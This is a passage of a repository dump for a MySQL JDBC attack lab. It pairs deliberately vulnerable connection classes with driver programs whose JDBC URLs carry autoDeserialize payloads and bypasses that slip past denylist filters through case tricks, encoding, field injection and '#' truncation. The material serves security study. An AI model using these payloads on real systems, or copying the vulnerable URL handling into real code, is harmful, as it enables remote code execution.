Repository: Y4Sec-Team/mysql-jdbc-tricks
Branch: master
Commit: dfc4f920ef75
Files: 26
Total size: 21.4 KB
Directory structure:
gitextract_z5ohkhvb/
├── .gitignore
├── README.md
├── pom.xml
└── src/
└── main/
└── java/
└── org/
└── y4sec/
└── team/
├── app/
│ ├── Application1.java
│ ├── Application10.java
│ ├── Application2.java
│ ├── Application3.java
│ ├── Application4.java
│ ├── Application5.java
│ ├── Application6.java
│ ├── Application7.java
│ ├── Application8.java
│ └── Application9.java
└── exploit/
├── Example1.java
├── Example10.java
├── Example2.java
├── Example3.java
├── Example4.java
├── Example5.java
├── Example6.java
├── Example7.java
├── Example7Bypass.java
├── Example8.java
├── Example8Bypass.java
├── Example9.java
└── Example9Bypass.java
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
target/
!.mvn/wrapper/maven-wrapper.jar
!**/src/main/**/target/
!**/src/test/**/target/
### IntelliJ IDEA ###
.idea/modules.xml
.idea/jarRepositories.xml
.idea/compiler.xml
.idea/libraries/
*.iws
*.iml
*.ipr
### Eclipse ###
.apt_generated
.classpath
.factorypath
.project
.settings
.springBeans
.sts4-cache
### NetBeans ###
/nbproject/private/
/nbbuild/
/dist/
/nbdist/
/.nb-gradle/
build/
!**/src/main/**/build/
!**/src/test/**/build/
### VS Code ###
.vscode/
### Mac OS ###
.DS_Store
.idea/
================================================
FILE: README.md
================================================
## mysql-jdbc-tricks
这里是很多`MySQL JDBC Attack`的小技巧,我仅在`MySQL`的`JDBC`驱动中测试,这里的技巧可能在其他类型的数据库驱动中也存在
文章:https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng
推荐搭建:推荐配合 https://github.com/4ra1n/mysql-fake-server 使用
### 基本示例
参考`Application1`和`Example1`代码
这是一个不存在任何过滤的情况,直接执行即可`RCE`
### 大小写绕过
参考`Application2`和`Example2`代码
这里展示了一种简单的防护和绕过,`MySQL`驱动对于连接参数的大小写不做限制,如果开发者不做大小写限制,将会被轻易绕过
### YES绕过
参考`Application3`和`Example3`代码
这里展示了一种简单的防护和绕过,`MySQL`驱动允许的`Bool`值是包含`true/yes`两种的,因此存在一种绕过
### 编码绕过
参考`Application4`和`Example4`代码
这里展示了某些情况下的绕过,`MySQL`驱动允许`URL`编码,因此如果开发者没有按照标准`URL`解析和过滤,将会存在绕过
### 暂时的安全
参考`Application5`和`Example5`代码
对于这种情况,似乎是安全了,或许有其他的绕过?
### 另一种形式的传参
参考`Application6`和`Example6`代码
这也是`JDBC`攻击很常见的一种情况
### 额外参数检查绕过
参考`Application7`和`Example7Bypass`代码
限制额外连接参数情况下如何绕过
### 特殊情况下的#号绕过
参考`Application8`和`Example8Bypass`代码
一种特殊情况的绕过,属于一种逻辑漏洞
### 另一种特殊场景的绕过
参考`Application9`和`Example9Bypass`代码
另一种特殊情况的绕过,开发者忽略某些参数过滤导致的绕过
### 可能安全
参考`Application10`和`Example10`代码
对于这种情况,似乎是安全了,或许有其他的绕过?
================================================
FILE: pom.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.y4sec</groupId>
<artifactId>mysql-jdbc-tricks</artifactId>
<version>1.0</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<!-- NOTE(review): the driver version below appears to be pinned on purpose so that the lab
     examples in this repository reproduce (the README says the tricks were tested against the
     MySQL JDBC driver only). Do not copy this dependency set into a production build; use a
     currently supported Connector/J release there. -->
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>6.0.2</version>
</dependency>
<!-- No class in this repository imports commons-beanutils; it is only placed on the classpath.
     NOTE(review): presumably it is part of the lab scenario; confirm before reusing this POM,
     and drop the dependency wherever it is not actually needed. -->
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.9.4</version>
</dependency>
</dependencies>
</project>
================================================
FILE: src/main/java/org/y4sec/team/app/Application1.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
/**
 * Lab target 1: passes a caller-supplied JDBC URL straight to the MySQL driver.
 *
 * <p>No part of the URL is inspected, so every connection property written into its query
 * string reaches the driver unchanged. This class is the unprotected baseline for the other lab
 * targets and is not a pattern to reuse: outside a lab, build the URL from validated host, port
 * and schema values and take driver properties from trusted configuration only.
 */
public class Application1 {
    private static final String DRIVER_CLASS = "com.mysql.cj.jdbc.Driver";

    /**
     * Loads the driver class and opens a connection to {@code url}.
     *
     * <p>The returned connection is discarded without being closed. Any exception is printed to
     * standard error and swallowed.
     *
     * @param url complete JDBC URL; used exactly as given
     */
    public static void connection(String url) {
        try {
            Class.forName(DRIVER_CLASS);
            DriverManager.getConnection(url);
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application10.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
/**
 * Lab target 10: assembles a JDBC URL from separate fields and applies a substring denylist to
 * {@code user}, {@code password}, {@code extra} and finally to the assembled URL.
 *
 * <p>Compared with {@code Application9}, the extra pass over the finished URL also covers text
 * that arrived through {@code addr} and {@code db}. The README marks this case as "possibly
 * safe". It is still a denylist over raw text: it only helps while the driver's own URL parser
 * agrees with a plain substring search. An allowlist of property names and values, with host,
 * port and schema validated separately, does not depend on that agreement.
 */
public class Application10 {
    /**
     * Builds {@code jdbc:mysql://addr/db?user=..&password=..[&extra]}, prints it and connects.
     *
     * <p>A denylist hit raises a {@link RuntimeException} inside the {@code try}, so it ends up
     * in the same catch block as connection errors: the stack trace is printed and nothing is
     * printed to standard output.
     *
     * @param addr host (and optional port) text placed after {@code jdbc:mysql://}
     * @param user value for the {@code user} property
     * @param db schema name placed in the path
     * @param password value for the {@code password} property
     * @param extra additional query text, appended after {@code &} unless empty
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            String base = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder query = new StringBuilder();
            query.append("user=").append(check(user));
            query.append("&");
            query.append("password=").append(check(password));
            if (!extra.isEmpty()) {
                query.append("&").append(check(extra));
            }
            String url = base + query;
            // Second pass over the finished URL: addr and db were never checked on their own.
            check(url);
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Returns {@code params} unchanged unless it contains the literal text
     * {@code autoDeserialize}.
     *
     * @throws RuntimeException when the literal text is present (case-sensitive substring match)
     */
    private static String check(String params) {
        if (!params.contains("autoDeserialize")) {
            return params;
        }
        throw new RuntimeException("you are hacker");
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application2.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
/**
 * Lab target 2: rejects a JDBC URL only when its query string carries the exact pair
 * {@code autoDeserialize=true}.
 *
 * <p>Both the key and the value are compared with a case-sensitive {@code equals}. The README
 * notes that the driver does not restrict letter case here, so this filter and the driver can
 * disagree about the same URL. A denylist built on a hand-rolled parser is only as good as its
 * agreement with the driver's parser; an allowlist of property names and values avoids that
 * dependency.
 */
public class Application2 {
    /**
     * Connects to {@code url} if {@link #check(String)} accepts it; otherwise prints
     * {@code you are hacker} and returns.
     *
     * @param url complete JDBC URL supplied by the caller
     */
    public static void connection(String url) {
        try {
            if (check(url)) {
                Class.forName("com.mysql.cj.jdbc.Driver");
                DriverManager.getConnection(url);
            } else {
                System.out.println("you are hacker");
            }
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Splits the text between the first and second {@code ?} into {@code key=value} pairs and
     * looks for {@code autoDeserialize} with the exact value {@code true}.
     *
     * @return {@code false} for that pair and for any URL that fails to parse (including one
     *     without a {@code ?}); {@code true} otherwise
     */
    private static boolean check(String jdbcUrl) {
        try {
            Map<String, String> properties = parseQuery(jdbcUrl.split("\\?")[1]);
            System.out.println("Params: " + properties);
            return !"true".equals(properties.get("autoDeserialize"));
        } catch (Exception failure) {
            failure.printStackTrace();
            return false;
        }
    }

    /** Parses {@code a=b&c=d} text; a key without a value maps to the empty string. */
    private static Map<String, String> parseQuery(String query) {
        Map<String, String> properties = new HashMap<>();
        for (String pair : query.split("&")) {
            String[] parts = pair.split("=");
            properties.put(parts[0], parts.length > 1 ? parts[1] : "");
        }
        return properties;
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application3.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
/**
 * Lab target 3: like {@code Application2}, but lower-cases the {@code autoDeserialize} value
 * before comparing it with {@code true}.
 *
 * <p>Only the single spelling {@code true} is rejected. The README notes that the driver accepts
 * both {@code true} and {@code yes} as boolean values, so the filter's idea of "enabled" is
 * narrower than the driver's. Validating against the set of values that are explicitly allowed,
 * rather than the ones known to be bad, closes this kind of gap.
 */
public class Application3 {
    /**
     * Connects to {@code url} if {@link #check(String)} accepts it; otherwise prints
     * {@code you are hacker} and returns.
     *
     * @param url complete JDBC URL supplied by the caller
     */
    public static void connection(String url) {
        try {
            if (check(url)) {
                Class.forName("com.mysql.cj.jdbc.Driver");
                DriverManager.getConnection(url);
            } else {
                System.out.println("you are hacker");
            }
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Parses the text between the first and second {@code ?} and rejects the URL when the
     * {@code autoDeserialize} value, lower-cased, equals {@code true}.
     *
     * @return {@code false} for a rejected or unparsable URL, {@code true} otherwise
     */
    private static boolean check(String jdbcUrl) {
        try {
            Map<String, String> properties = parseQuery(jdbcUrl.split("\\?")[1]);
            System.out.println("Params: " + properties);
            String flag = properties.get("autoDeserialize");
            if (flag == null) {
                return true;
            }
            return !flag.toLowerCase().equals("true");
        } catch (Exception failure) {
            failure.printStackTrace();
            return false;
        }
    }

    /** Parses {@code a=b&c=d} text; a key without a value maps to the empty string. */
    private static Map<String, String> parseQuery(String query) {
        Map<String, String> properties = new HashMap<>();
        for (String pair : query.split("&")) {
            String[] parts = pair.split("=");
            properties.put(parts[0], parts.length > 1 ? parts[1] : "");
        }
        return properties;
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application4.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
/**
 * Lab target 4: rejects {@code autoDeserialize} when its lower-cased value is {@code true} or
 * {@code yes}.
 *
 * <p>The comparison runs on the raw query text; nothing here percent-decodes it. The README
 * notes that the driver accepts URL-encoded text, so the filter and the driver may read the same
 * bytes differently. Any check of this kind has to decode and normalise exactly as the consumer
 * does, or better, accept only an allowlisted set of properties.
 */
public class Application4 {
    /**
     * Connects to {@code url} if {@link #check(String)} accepts it; otherwise prints
     * {@code you are hacker} and returns.
     *
     * @param url complete JDBC URL supplied by the caller
     */
    public static void connection(String url) {
        try {
            if (check(url)) {
                Class.forName("com.mysql.cj.jdbc.Driver");
                DriverManager.getConnection(url);
            } else {
                System.out.println("you are hacker");
            }
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Parses the text between the first and second {@code ?} and rejects the URL when the
     * {@code autoDeserialize} value, lower-cased, is {@code true} or {@code yes}.
     *
     * @return {@code false} for a rejected or unparsable URL, {@code true} otherwise
     */
    private static boolean check(String jdbcUrl) {
        try {
            Map<String, String> properties = parseQuery(jdbcUrl.split("\\?")[1]);
            System.out.println("Params: " + properties);
            String flag = properties.get("autoDeserialize");
            if (flag == null) {
                return true;
            }
            String lowered = flag.toLowerCase();
            return !(lowered.equals("true") || lowered.equals("yes"));
        } catch (Exception failure) {
            failure.printStackTrace();
            return false;
        }
    }

    /** Parses {@code a=b&c=d} text; a key without a value maps to the empty string. */
    private static Map<String, String> parseQuery(String query) {
        Map<String, String> properties = new HashMap<>();
        for (String pair : query.split("&")) {
            String[] parts = pair.split("=");
            properties.put(parts[0], parts.length > 1 ? parts[1] : "");
        }
        return properties;
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application5.java
================================================
package org.y4sec.team.app;
import java.net.URI;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
/**
 * Lab target 5: parses the JDBC URL with {@link URI} before applying the
 * {@code autoDeserialize} denylist.
 *
 * <p>{@link URI#getQuery()} returns the decoded query, so percent-encoded values are compared
 * in decoded form, unlike in {@code Application4}. The README describes this case as apparently
 * safe and leaves open whether other bypasses exist. It remains a denylist for one property,
 * evaluated by a parser that is not the driver's; an allowlist of property names and values is
 * the more robust control.
 */
public class Application5 {
    /**
     * Connects to {@code url} if {@link #check(String)} accepts it; otherwise prints
     * {@code you are hacker} and returns.
     *
     * @param url complete JDBC URL supplied by the caller
     */
    public static void connection(String url) {
        try {
            if (check(url)) {
                Class.forName("com.mysql.cj.jdbc.Driver");
                DriverManager.getConnection(url);
            } else {
                System.out.println("you are hacker");
            }
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Strips every {@code jdbc:} occurrence, parses the rest as a URI, prints host, port, schema
     * and parameters, and rejects the URL when the {@code autoDeserialize} value, lower-cased,
     * is {@code true} or {@code yes}.
     *
     * @return {@code false} for a rejected URL or one that fails to parse (for example an empty
     *     path); {@code true} otherwise, including when there is no query at all
     */
    private static boolean check(String jdbcUrl) {
        try {
            URI parsed = new URI(jdbcUrl.replace("jdbc:", ""));
            String host = parsed.getHost();
            int port = parsed.getPort();
            // Drops the leading '/' of the path; throws (and so rejects) when the path is empty.
            String dbname = parsed.getPath().substring(1);

            Map<String, String> properties = new HashMap<>();
            String query = parsed.getQuery();
            if (query != null) {
                for (String pair : query.split("&")) {
                    String[] parts = pair.split("=");
                    properties.put(parts[0], parts.length > 1 ? parts[1] : "");
                }
            }

            System.out.println("Host: " + host);
            System.out.println("Port: " + port);
            System.out.println("DB Name: " + dbname);
            System.out.println("Params: " + properties);

            String flag = properties.get("autoDeserialize");
            if (flag == null) {
                return true;
            }
            String lowered = flag.toLowerCase();
            return !(lowered.equals("true") || lowered.equals("yes"));
        } catch (Exception failure) {
            failure.printStackTrace();
            return false;
        }
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application6.java
================================================
package org.y4sec.team.app;
import java.net.URLDecoder;
import java.sql.DriverManager;
/**
 * Lab target 6: assembles a JDBC URL from separate caller-supplied fields with no validation.
 *
 * <p>Every field is concatenated into the URL as raw text, so a field that contains
 * {@code &}, {@code ?} or {@code /} can change the structure of the URL rather than just
 * supply a value. The README calls this a very common shape for the problem. Outside a lab,
 * validate host, port and schema against strict patterns, pass credentials through
 * {@code DriverManager.getConnection(String, java.util.Properties)} instead of the URL, and
 * accept extra properties only from an allowlist.
 */
public class Application6 {
    /**
     * Builds {@code jdbc:mysql://addr/db?user=..&password=..[&extra]} and connects to it.
     *
     * <p>The returned connection is discarded. Any exception is printed and swallowed.
     *
     * @param addr host (and optional port) text placed after {@code jdbc:mysql://}
     * @param user value for the {@code user} property
     * @param db schema name placed in the path
     * @param password value for the {@code password} property
     * @param extra additional query text, appended after {@code &} unless empty
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            StringBuilder jdbcUrl = new StringBuilder(String.format("jdbc:mysql://%s/%s?", addr, db));
            jdbcUrl.append("user=").append(user);
            jdbcUrl.append("&");
            jdbcUrl.append("password=").append(password);
            if (!extra.isEmpty()) {
                jdbcUrl.append("&").append(extra);
            }
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(jdbcUrl.toString());
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application7.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
import java.util.HashMap;
import java.util.Map;
/**
 * Lab target 7: assembles a JDBC URL from separate fields and applies a substring denylist to
 * the {@code extra} field only.
 *
 * <p>{@code addr}, {@code user}, {@code db} and {@code password} are concatenated without any
 * check, although they end up in the same URL as {@code extra}. Validation has to cover every
 * caller-controlled field, or be applied to what the driver will actually parse. Passing
 * credentials through a {@code java.util.Properties} object keeps them out of the URL
 * altogether.
 */
public class Application7 {
    /**
     * Builds {@code jdbc:mysql://addr/db?user=..&password=..[&extra]}, prints it and connects,
     * unless {@code extra} fails {@link #check(String)}, in which case
     * {@code you are hacker} is printed instead.
     *
     * @param addr host (and optional port) text placed after {@code jdbc:mysql://}
     * @param user value for the {@code user} property
     * @param db schema name placed in the path
     * @param password value for the {@code password} property
     * @param extra additional query text, appended after {@code &} unless empty
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            String base = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder query = new StringBuilder();
            query.append("user=").append(user);
            query.append("&");
            query.append("password=").append(password);
            // Only the extra field is screened.
            if (!check(extra)) {
                System.out.println("you are hacker");
                return;
            }
            if (!extra.isEmpty()) {
                query.append("&").append(extra);
            }
            String url = base + query;
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Reports whether {@code params} is free of the literal text {@code autoDeserialize}
     * (case-sensitive substring match).
     *
     * @return {@code false} when the text is present or when the lookup itself fails
     */
    private static boolean check(String params) {
        boolean allowed;
        try {
            allowed = !params.contains("autoDeserialize");
        } catch (Exception failure) {
            failure.printStackTrace();
            allowed = false;
        }
        return allowed;
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application8.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
/**
 * Lab target 8: like {@code Application7}, plus a forced {@code autoDeserialize=false} written
 * at the end of the URL.
 *
 * <p>Two things are worth noting for anyone reading this as a defensive pattern. First, the
 * forced setting is placed after caller-controlled text, so whether it takes effect depends on
 * how that text ends; the README files this case under the {@code #} bypass and calls it a
 * logic flaw. Second, the {@code endsWith("?")} test looks at the base URL before the query
 * text is attached; the base always ends with {@code ?}, so the branch that would add a
 * separating {@code &} is never taken. Fixed driver settings belong in a
 * {@code java.util.Properties} object built from trusted values, not in a suffix appended to
 * untrusted text.
 */
public class Application8 {
    /**
     * Builds {@code jdbc:mysql://addr/db?user=..&password=..[&extra]} followed by
     * {@code autoDeserialize=false}, prints it and connects, unless {@code extra} fails
     * {@link #check(String)}, in which case {@code you are hacker} is printed instead.
     *
     * @param addr host (and optional port) text placed after {@code jdbc:mysql://}
     * @param user value for the {@code user} property
     * @param db schema name placed in the path
     * @param password value for the {@code password} property
     * @param extra additional query text, appended after {@code &} unless empty
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            String url = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder query = new StringBuilder();
            query.append("user=").append(user);
            query.append("&");
            query.append("password=").append(password);
            // Only the extra field is screened.
            if (!check(extra)) {
                System.out.println("you are hacker");
                return;
            }
            if (!extra.isEmpty()) {
                query.append("&").append(extra);
            }
            // url still holds only the base here, which always ends with '?'.
            String forcedSetting = url.endsWith("?") ? "autoDeserialize=false" : "&autoDeserialize=false";
            url = url + query + forcedSetting;
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Reports whether {@code params} is free of the literal text {@code autoDeserialize}
     * (case-sensitive substring match).
     *
     * @return {@code false} when the text is present or when the lookup itself fails
     */
    private static boolean check(String params) {
        boolean allowed;
        try {
            allowed = !params.contains("autoDeserialize");
        } catch (Exception failure) {
            failure.printStackTrace();
            allowed = false;
        }
        return allowed;
    }
}
================================================
FILE: src/main/java/org/y4sec/team/app/Application9.java
================================================
package org.y4sec.team.app;
import java.sql.DriverManager;
/**
 * Lab target 9: assembles a JDBC URL from separate fields and applies a substring denylist to
 * {@code user}, {@code password} and {@code extra}.
 *
 * <p>{@code addr} and {@code db} are formatted into the URL without any check, so the
 * validation does not cover everything the driver will parse. The README describes this as a
 * bypass caused by the developer leaving some parameters unfiltered. Host, port and schema need
 * their own strict validation (for example a hostname and port pattern and an identifier
 * pattern), independent of any property filtering.
 */
public class Application9 {
    /**
     * Builds {@code jdbc:mysql://addr/db?user=..&password=..[&extra]}, prints it and connects.
     *
     * <p>A denylist hit raises a {@link RuntimeException} inside the {@code try}, so it ends up
     * in the same catch block as connection errors: the stack trace is printed and nothing is
     * printed to standard output.
     *
     * @param addr host (and optional port) text placed after {@code jdbc:mysql://}; not checked
     * @param user value for the {@code user} property
     * @param db schema name placed in the path; not checked
     * @param password value for the {@code password} property
     * @param extra additional query text, appended after {@code &} unless empty
     */
    public static void connection(String addr, String user, String db, String password, String extra) {
        try {
            String base = String.format("jdbc:mysql://%s/%s?", addr, db);
            StringBuilder query = new StringBuilder();
            query.append("user=").append(check(user));
            query.append("&");
            query.append("password=").append(check(password));
            if (!extra.isEmpty()) {
                query.append("&").append(check(extra));
            }
            String url = base + query;
            System.out.println(url);
            Class.forName("com.mysql.cj.jdbc.Driver");
            DriverManager.getConnection(url);
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }

    /**
     * Returns {@code params} unchanged unless it contains the literal text
     * {@code autoDeserialize}.
     *
     * @throws RuntimeException when the literal text is present (case-sensitive substring match)
     */
    private static String check(String params) {
        if (!params.contains("autoDeserialize")) {
            return params;
        }
        throw new RuntimeException("you are hacker");
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example1.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application1;
/**
 * Lab driver for {@code Application1}, the target that performs no validation.
 *
 * <p>The README describes this as the unfiltered baseline case.
 */
public class Example1 {
    /**
     * Sends one JDBC URL with the lab's query string to {@code Application1}.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // NOTE(review): loopback address of the lab's test server; the README recommends
        // running this repository together with mysql-fake-server. Confirm the port locally.
        final String endpoint = "127.0.0.1:62787";
        final String query = "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe";
        Application1.connection(String.format("jdbc:mysql://%s/test?%s", endpoint, query));
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example10.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application10;
/**
 * Lab driver for {@code Application10}.
 *
 * <p>It reuses the inputs of {@code Example9Bypass}: the denylisted text travels in the
 * {@code addr} field. {@code Application10} also runs its check over the assembled URL, which
 * contains that text; the README lists this case as "possibly safe".
 */
public class Example10 {
    /**
     * Calls {@code Application10.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint =
                "127.0.0.1:62787/test?detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe&#";
        final String account = "deser_CB_calc.exe";
        final String secret = "test";
        final String schema = "test";
        final String extraParams = "";
        Application10.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example2.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application2;
/**
 * Lab driver for {@code Application2}, whose filter compares the {@code autoDeserialize} value
 * with the exact string {@code true}.
 *
 * <p>Two URLs are sent: one with the value written as {@code true}, which the filter matches,
 * and one with the same value in mixed case, which an exact string comparison does not match.
 * The pair illustrates why a filter must normalise input the same way its consumer does.
 */
public class Example2 {
    /**
     * Sends both query strings, in order, to {@code Application2}.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        final String endpoint = "127.0.0.1:62787";
        final String[] queries = {
            "detectCustomCollations=true&autoDeserialize=true&user=deser_CB_calc.exe",
            "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe",
        };
        for (String query : queries) {
            Application2.connection(String.format("jdbc:mysql://%s/test?%s", endpoint, query));
        }
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example3.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application3;
/**
 * Lab driver for {@code Application3}, whose filter lower-cases the {@code autoDeserialize}
 * value and compares it with {@code true} only.
 *
 * <p>Two URLs are sent: the mixed-case value, which the lower-casing filter now matches, and the
 * value {@code yes}, which it does not compare against. The README notes that the driver treats
 * {@code true} and {@code yes} alike.
 */
public class Example3 {
    /**
     * Sends both query strings, in order, to {@code Application3}.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        final String endpoint = "127.0.0.1:62787";
        final String[] queries = {
            "detectCustomCollations=true&autoDeserialize=tRue&user=deser_CB_calc.exe",
            "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe",
        };
        for (String query : queries) {
            Application3.connection(String.format("jdbc:mysql://%s/test?%s", endpoint, query));
        }
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example4.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application4;
/**
 * Lab driver for {@code Application4}, whose filter rejects the lower-cased values
 * {@code true} and {@code yes} but inspects the raw, undecoded query text.
 *
 * <p>Two URLs are sent: the value {@code yes}, which the filter matches, and a percent-encoded
 * value, which a comparison on raw text does not match. The README notes that the driver
 * accepts URL-encoded text.
 */
public class Example4 {
    /**
     * Sends both query strings, in order, to {@code Application4}.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        final String endpoint = "127.0.0.1:62787";
        final String[] queries = {
            "detectCustomCollations=true&autoDeserialize=yes&user=deser_CB_calc.exe",
            "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe",
        };
        for (String query : queries) {
            Application4.connection(String.format("jdbc:mysql://%s/test?%s", endpoint, query));
        }
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example5.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application5;
/**
 * Lab driver for {@code Application5}, whose filter parses the URL with {@code java.net.URI}
 * and therefore compares the decoded query.
 *
 * <p>The percent-encoded value from {@code Example4} is sent again; the README describes this
 * case as apparently safe.
 */
public class Example5 {
    /**
     * Sends one JDBC URL with a percent-encoded value to {@code Application5}.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        final String endpoint = "127.0.0.1:62787";
        final String query = "detectCustomCollations=true&autoDeserialize=%74%72%75%65&user=deser_CB_calc.exe";
        Application5.connection(String.format("jdbc:mysql://%s/test?%s", endpoint, query));
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example6.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application6;
/**
 * Lab driver for {@code Application6}, which assembles the URL from separate fields without
 * any validation.
 *
 * <p>The connection properties are supplied through the {@code extra} field.
 */
public class Example6 {
    /**
     * Calls {@code Application6.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint = "127.0.0.1:62787";
        final String account = "deser_CB_calc.exe";
        final String secret = "test";
        final String schema = "test";
        final String extraParams = "detectCustomCollations=true&autoDeserialize=true";
        Application6.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example7.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application7;
/**
 * Lab driver for {@code Application7}, which screens only the {@code extra} field.
 *
 * <p>Here the denylisted text is in {@code extra}, the one field the filter inspects, so this
 * is the case the filter catches.
 */
public class Example7 {
    /**
     * Calls {@code Application7.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint = "127.0.0.1:62787";
        final String account = "deser_CB_calc.exe";
        final String secret = "test";
        final String schema = "test";
        final String extraParams = "detectCustomCollations=true&autoDeserialize=true";
        Application7.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example7Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application7;
/**
 * Lab driver for {@code Application7}, which screens only the {@code extra} field.
 *
 * <p>Here the denylisted text is carried in {@code password}, a field that
 * {@code Application7} concatenates into the URL without checking. The case shows that a filter
 * has to cover every caller-controlled field that reaches the URL.
 */
public class Example7Bypass {
    /**
     * Calls {@code Application7.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint = "127.0.0.1:62787";
        final String account = "deser_CB_calc.exe";
        final String secret = "test&autoDeserialize=true&";
        final String schema = "test";
        final String extraParams = "detectCustomCollations=true&";
        Application7.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example8.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application8;
/**
 * Lab driver for {@code Application8}, which screens {@code extra} and then appends
 * {@code autoDeserialize=false} to the end of the URL.
 *
 * <p>The inputs are the same as in {@code Example7Bypass}; with them, the setting appended by
 * {@code Application8} is the last parameter in the assembled URL.
 */
public class Example8 {
    /**
     * Calls {@code Application8.connection} with the field values below.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Values under the caller's control.
        final String endpoint = "127.0.0.1:62787";
        final String account = "deser_CB_calc.exe";
        final String secret = "test&autoDeserialize=true&";
        final String schema = "test";
        final String extraParams = "detectCustomCollations=true&";
        Application8.connection(endpoint, account, schema, secret, extraParams);
    }
}
================================================
FILE: src/main/java/org/y4sec/team/exploit/Example8Bypass.java
================================================
package org.y4sec.team.exploit;
import org.y4sec.team.app.Application8;
/**
